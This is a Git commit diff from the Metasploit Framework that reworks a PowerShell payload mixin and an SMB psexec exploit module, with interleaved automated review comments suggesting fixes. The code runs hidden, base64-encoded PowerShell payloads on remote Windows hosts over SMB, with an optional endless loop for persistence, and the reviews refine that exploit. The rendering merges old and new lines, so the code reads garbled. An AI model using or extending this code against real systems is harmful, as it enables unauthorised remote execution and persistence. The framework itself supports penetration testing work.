Merge branch 'powershell_import' of github.com:sempervictus/metasploit-framework into powershell_import

bug/bundler_fix
RageLtMan 2013-07-31 18:39:46 -04:00
commit 2c850d8f8b
2 changed files with 35 additions and 22 deletions


@ -11,7 +11,9 @@ module Exploit::Powershell
super super
register_advanced_options( register_advanced_options(
[ [
OptBool.new('RUN_WOW64', [ OptBool.new('PSH::PERSIST', [true, 'Run the payload in a loop', false]),
OptBool.new('PSH::OLD_METHOD', [true, 'Use powershell 1.0', false]),
OptBool.new('PSH::RUN_WOW64', [
false, false,
'Execute powershell in 32bit compatibility mode, payloads need native arch', 'Execute powershell in 32bit compatibility mode, payloads need native arch',
false false
@ -98,7 +100,7 @@ EOS
# #
# Creates cmd script to execute psh payload # Creates cmd script to execute psh payload
# #
def cmd_psh_payload(pay, old_psh=false) def cmd_psh_payload(pay, old_psh=datastore['PSH::OLD_METHOD'], wow64=datastore['PSH::RUN_WOW64'])
# Allow powershell 1.0 format # Allow powershell 1.0 format
if old_psh if old_psh
psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay) psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
@ -106,14 +108,14 @@ EOS
psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay) psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
end end
# Run our payload in a while loop # Run our payload in a while loop
if datastore['PERSIST'] if datastore['PSH::PERSIST']
fun_name = Rex::Text.rand_text_alpha(rand(2)+2) fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
sleep_time = rand(5)+5 sleep_time = rand(5)+5
psh_payload = "function #{fun_name}{#{psh_payload}};" psh_payload = "function #{fun_name}{#{psh_payload}};"
psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};" psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
end end
# Determine appropriate architecture, manual method reduces script size # Determine appropriate architecture, manual method reduces script size
ps_bin = datastore['RUN_WOW64'] ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe' ps_bin = wow64 ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
# Wrap in hidden runtime # Wrap in hidden runtime
psh_payload = run_hidden_psh(psh_payload,ps_bin) psh_payload = run_hidden_psh(psh_payload,ps_bin)
# Convert to base64 for -encodedcommand execution # Convert to base64 for -encodedcommand execution
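Review bot: The new signature turns `PSH::OLD_METHOD` and `PSH::RUN_WOW64` into overridable parameters, but the persist toggle a few lines below is still read straight from `datastore['PSH::PERSIST']`, so a caller that passes explicit values cannot control the loop wrapper the same way. For consistency the third flag should follow the same pattern: `def cmd_psh_payload(pay, old_psh=datastore['PSH::OLD_METHOD'], wow64=datastore['PSH::RUN_WOW64'], persist=datastore['PSH::PERSIST'])` with the branch changed to `if persist`. The header comment above the method should also name the three flags and note that their defaults are resolved from the datastore at call time, since the defaults are expressions rather than literals. cmd_psh_payload's body continues past the end of this hunk.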


@ -1,6 +1,14 @@
# -*- coding: binary -*- # -*- coding: binary -*-
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core' require 'msf/core'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking Rank = ManualRanking
@ -8,8 +16,6 @@ class Metasploit3 < Msf::Exploit::Remote
# Exploit mixins should be called first # Exploit mixins should be called first
include Msf::Exploit::Remote::SMB::Psexec include Msf::Exploit::Remote::SMB::Psexec
include Msf::Exploit::Powershell include Msf::Exploit::Powershell
include Msf::Auxiliary::Report
include Msf::Exploit::EXE
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -29,7 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote
}, },
'Author' => [ 'Author' => [
'RageLtMan <rageltman[at]sempervictus' 'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
'RageLtMan <rageltman[at]sempervictus' # PSH exploit, libs, encoders
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
@ -48,9 +55,11 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { } ], [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 01 1999',
'References' => [ 'References' => [
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
[ 'OSVDB', '3106'], [ 'OSVDB', '3106'],
@ -61,43 +70,45 @@ class Metasploit3 < Msf::Exploit::Remote
)) ))
register_options([ register_options([
OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
OptBool.new('DryRun',[false,'dry run',false]), OptBool.new('DryRun',[false,'dry run',false]),
], self.class) ], self.class)
end end
def exploit def exploit
command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD']) command = cmd_psh_payload(payload.encoded)
if datastore['DryRun'] if datastore['DryRun']
print_good command print_good command
return return
end end
#Try and authenticate with given credentials if datastore['PSH::RUN_WOW64'] and target_arch.first == "x86_64"
fail_with(Exploit::Failure::BadConfig, "Select an x86 target and payload with RUN_WOW64 enabled")
end
# Try and authenticate with given credentials
if connect if connect
begin begin
smb_login smb_login
rescue StandardError => autherror rescue StandardError => autherror
print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}") fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
return ensure
disconnect
end end
# Execute the powershell command # Execute the powershell command
begin
print_status("#{peer} - Executing the payload...") print_status("#{peer} - Executing the payload...")
#vprint_good(command) begin
return psexec(command) return psexec(command)
rescue StandardError => exec_command_error rescue StandardError => exec_command_error
print_error("#{peer} - Unable to execute specified command: #{exec_command_error}") fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
return false ensure
end
disconnect disconnect
end end
end end
end
def peer def peer
return "#{rhost}:#{rport}" return "#{rhost}:#{rport}"
end end
end end
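Review bot: The `PSH::RUN_WOW64` / x86_64 target check is placed after the `DryRun` early return and after the command has already been generated, so a dry run with the contradictory configuration prints a command that the real run would reject; moving the `fail_with(Exploit::Failure::BadConfig, ...)` block to the top of `exploit`, before `cmd_psh_payload` is called, reports the misconfiguration in both paths. The condition also uses the low-precedence keyword `and`, which should be `&&` in a boolean expression: `if datastore['PSH::RUN_WOW64'] && target_arch.first == "x86_64"`. If the single-sided `disconnect` in the login block's `ensure` is on the new side, the session is torn down immediately after `smb_login` succeeds and before `psexec(command)` runs; the rendered view does not make the side certain, so please confirm that only the second `ensure` calls `disconnect`.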